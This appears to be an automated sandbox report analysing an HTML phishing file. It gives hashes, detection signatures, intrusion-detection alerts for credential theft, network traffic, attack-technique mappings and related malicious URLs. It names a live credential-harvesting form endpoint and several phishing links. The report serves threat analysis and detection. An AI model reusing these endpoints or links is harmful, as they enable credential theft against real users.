Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tmpAE4B.HTmL.html

Overview

General Information

Sample name:tmpAE4B.HTmL.html
Analysis ID:1583120
MD5:41f5b723ea469bc0c87031c3e05cda42
SHA1:41678f4f14d0a25a1776443133477a4152a043e5
SHA256:93d1b7852b31c719183f3a2f0ab9bac024eccee79ec78920e7694eba716fd7f9
Tags:htmluser-cocaman
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Multi AV Scanner detection for submitted file
Yara detected HtmlPhish10
HTML file submission containing password form
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
Suricata IDS alerts with low severity for network traffic
Suspicious form URL found

Classification

  • System is w10x64
  • chrome.exe (PID: 4624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\tmpAE4B.HTmL.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,7185164192713812909,7523031163983281264,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
tmpAE4B.HTmL.htmlJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-01T22:51:21.754642+010028122371Successful Credential Theft Detected192.168.2.449752130.185.81.111443TCP
    2025-01-01T22:51:45.408297+010028122371Successful Credential Theft Detected192.168.2.449756130.185.81.111443TCP
    2025-01-01T22:52:11.539913+010028122371Successful Credential Theft Detected192.168.2.449832130.185.81.111443TCP
    2025-01-01T22:52:37.777248+010028122371Successful Credential Theft Detected192.168.2.450000130.185.81.111443TCP
    2025-01-01T22:53:04.875267+010028122371Successful Credential Theft Detected192.168.2.450030130.185.81.111443TCP
    2025-01-01T22:53:38.140920+010028122371Successful Credential Theft Detected192.168.2.450034130.185.81.111443TCP
    2025-01-01T22:54:01.105720+010028122371Successful Credential Theft Detected192.168.2.450035130.185.81.111443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: tmpAE4B.HTmL.htmlReversingLabs: Detection: 13%

    Phishing

    barindex
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.0.pages.csv
    Source: Yara matchFile source: tmpAE4B.HTmL.html, type: SAMPLE
    Source: tmpAE4B.HTmL.htmlHTTP Parser: Number of links: 0
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlHTTP Parser: Number of links: 0
    Source: tmpAE4B.HTmL.htmlHTTP Parser: Title: m.s - lgpartner.ch does not match URL
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlHTTP Parser: Title: m.s - lgpartner.ch does not match URL
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlHTTP Parser: Has password / email / username input fields
    Source: tmpAE4B.HTmL.htmlHTTP Parser: Form action: https://gruposafety.cv/NPO/excelaccess.php
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlHTTP Parser: Form action: https://gruposafety.cv/NPO/excelaccess.php
    Source: tmpAE4B.HTmL.htmlHTTP Parser: <input type="password" .../> found
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlHTTP Parser: <input type="password" .../> found
    Source: tmpAE4B.HTmL.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlHTTP Parser: No favicon
    Source: tmpAE4B.HTmL.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlHTTP Parser: No <meta name="author".. found
    Source: tmpAE4B.HTmL.htmlHTTP Parser: No <meta name="copyright".. found
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlHTTP Parser: No <meta name="copyright".. found
    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
    Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.4:49752 -> 130.185.81.111:443
    Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.4:49756 -> 130.185.81.111:443
    Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.4:49832 -> 130.185.81.111:443
    Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.4:50030 -> 130.185.81.111:443
    Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.4:50034 -> 130.185.81.111:443
    Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.4:50035 -> 130.185.81.111:443
    Source: Network trafficSuricata IDS: 2812237 - Severity 1 - ETPRO PHISHING Possible Successful Generic Phish July 28 : 192.168.2.4:50000 -> 130.185.81.111:443
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gruposafety.cvConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gruposafety.cv/NPO/excelaccess.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gruposafety.cvConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gruposafety.cv/NPO/excelaccess.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gruposafety.cvConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gruposafety.cv/NPO/excelaccess.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gruposafety.cvConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gruposafety.cv/NPO/excelaccess.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gruposafety.cvConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gruposafety.cv/NPO/excelaccess.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gruposafety.cvConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gruposafety.cv/NPO/excelaccess.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gruposafety.cvConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gruposafety.cv/NPO/excelaccess.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: gruposafety.cv
    Source: unknownHTTP traffic detected: POST /NPO/excelaccess.php HTTP/1.1Host: gruposafety.cvConnection: keep-aliveContent-Length: 60Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: tmpAE4B.HTmL.htmlString found in binary or memory: https://gruposafety.cv/NPO/excelaccess.php
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
    Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: classification engineClassification label: mal68.phis.winHTML@38/14@6/7
    Source: tmpAE4B.HTmL.htmlReversingLabs: Detection: 13%
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\tmpAE4B.HTmL.html"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,7185164192713812909,7523031163983281264,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,7185164192713812909,7523031163983281264,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected

    Stealing of Sensitive Information

    barindex
    Source: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmlHTTP Parser: file:///C:/Users/user/Desktop/tmpAE4B.HTmL.html
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Obfuscated Files or Information
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    tmpAE4B.HTmL.html13%ReversingLabsDocument-HTML.Trojan.Heuristic
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    file:///C:/Users/user/Desktop/tmpAE4B.HTmL.html0%Avira URL Cloudsafe
    https://gruposafety.cv/NPO/excelaccess.php0%Avira URL Cloudsafe
    https://gruposafety.cv/favicon.ico0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    www.google.com
    142.250.185.228
    truefalse
      high
      gruposafety.cv
      130.185.81.111
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        file:///C:/Users/user/Desktop/tmpAE4B.HTmL.htmltrue
        • Avira URL Cloud: safe
        unknown
        https://gruposafety.cv/NPO/excelaccess.phpfalse
        • Avira URL Cloud: safe
        unknown
        https://gruposafety.cv/favicon.icofalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        142.250.185.228
        www.google.comUnited States
        15169GOOGLEUSfalse
        130.185.81.111
        gruposafety.cvPortugal
        24768ALMOUROLTECPTfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        142.250.185.196
        unknownUnited States
        15169GOOGLEUSfalse
        IP
        192.168.2.4
        192.168.2.23
        192.168.2.15
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1583120
        Start date and time:2025-01-01 22:50:10 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 7s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowshtmlcookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:tmpAE4B.HTmL.html
        Detection:MAL
        Classification:mal68.phis.winHTML@38/14@6/7
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .html
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.185.110, 64.233.166.84, 172.217.18.14, 142.250.185.238, 142.250.185.174, 142.250.186.42, 142.250.74.202, 142.250.184.234, 142.250.186.106, 142.250.186.74, 142.250.185.74, 172.217.18.10, 142.250.186.138, 216.58.206.74, 216.58.212.170, 172.217.23.106, 142.250.185.170, 142.250.185.106, 142.250.185.138, 172.217.16.202, 142.250.185.202, 199.232.214.172, 192.229.221.95, 142.250.181.238, 142.250.74.206, 172.217.16.142, 142.250.184.227, 142.250.186.78, 142.250.185.206, 142.250.185.142, 142.250.185.78, 184.28.90.27, 20.12.23.50, 13.107.246.45
        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
        • Not all processes where analyzed, report is missing behavior information
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        239.255.255.25001012025.htmlGet hashmaliciousHTMLPhisherBrowse
          https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
            http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
              https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGVJFQli_mKczqrYpzYk33dCMwBXQR8R8u2JajJsC51OFcIlRSs_l3i1d9MQf5ZYWuxV_Ytx1pTi2iUY6P97JH0U81Get hashmaliciousUnknownBrowse
                  http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGu732v1MZ_EelGtWldAkkdtYGfnD-GIQEN8fgQfvllyKpzr3-J0fwpuBZsUPy3J_TvPM8sfKRevcMTcDv6eAynng1Get hashmaliciousUnknownBrowse
                    NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousXmrigBrowse
                      snmpapi.exeGet hashmaliciousBraodoBrowse
                        https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                          snmpapi.exeGet hashmaliciousBraodoBrowse
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ALMOUROLTECPTdb0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                            • 94.46.181.108
                            armv7l.elfGet hashmaliciousUnknownBrowse
                            • 94.46.181.138
                            5.msiGet hashmaliciousDanaBot, NitolBrowse
                            • 185.174.135.68
                            1.eGet hashmaliciousDanaBotBrowse
                            • 185.174.135.68
                            sh4.elfGet hashmaliciousUnknownBrowse
                            • 94.46.130.237
                            xd.mpsl.elfGet hashmaliciousMiraiBrowse
                            • 94.46.181.107
                            https://adrianocarreira.com/team/index.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 94.46.167.218
                            https://mail.sapo.pt@www.bing.com/ck/a?!&&p=35b6df18bbec504aJmltdHM9MTcyNzIyMjQwMCZpZ3VpZD0yMDU5MDFlMi05N2Q5LTZjNjItMjIzNS0xNGU3OTY0MzZkZGMmaW5zaWQ9NTI5MQ&ptn=3&ver=2&hsh=3&fclid=205901e2-97d9-6c62-2235-14e796436ddc&u=a1aHR0cHM6Ly9ienNzLnB0L3dwLWNvbnRlbnQvcGx1Z2lucy9ibS1wYWdlYnVpbGRlci9pbmNfcGhwL3V4LXBiLXRoZW1lLWFqYXgucGhwIzp-OnRleHQ9Ynpzcy5wdA&ntb=1Get hashmaliciousUnknownBrowse
                            • 94.46.183.96
                            http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/Get hashmaliciousUnknownBrowse
                            • 94.46.180.190
                            http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20=Get hashmaliciousUnknownBrowse
                            • 94.46.180.190
                            No context
                            No context
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with CRLF line terminators
                            Category:downloaded
                            Size (bytes):114
                            Entropy (8bit):4.809123192083323
                            Encrypted:false
                            SSDEEP:3:gV7gx0A/F1JhWAAAISAL7A3dAlaSa8FcAUMBc7Mv:sU0EFxAAv076dAESaMUMBYMv
                            MD5:CE4E323CD29BC7FDAB5FDA6C809D2602
                            SHA1:62A36CC9255A14241D69F83A17E8031CAB3FAA9F
                            SHA-256:3F1FD2910CD2940B53728A42F16C3F9E35EE61882A7537AF322250E889F21560
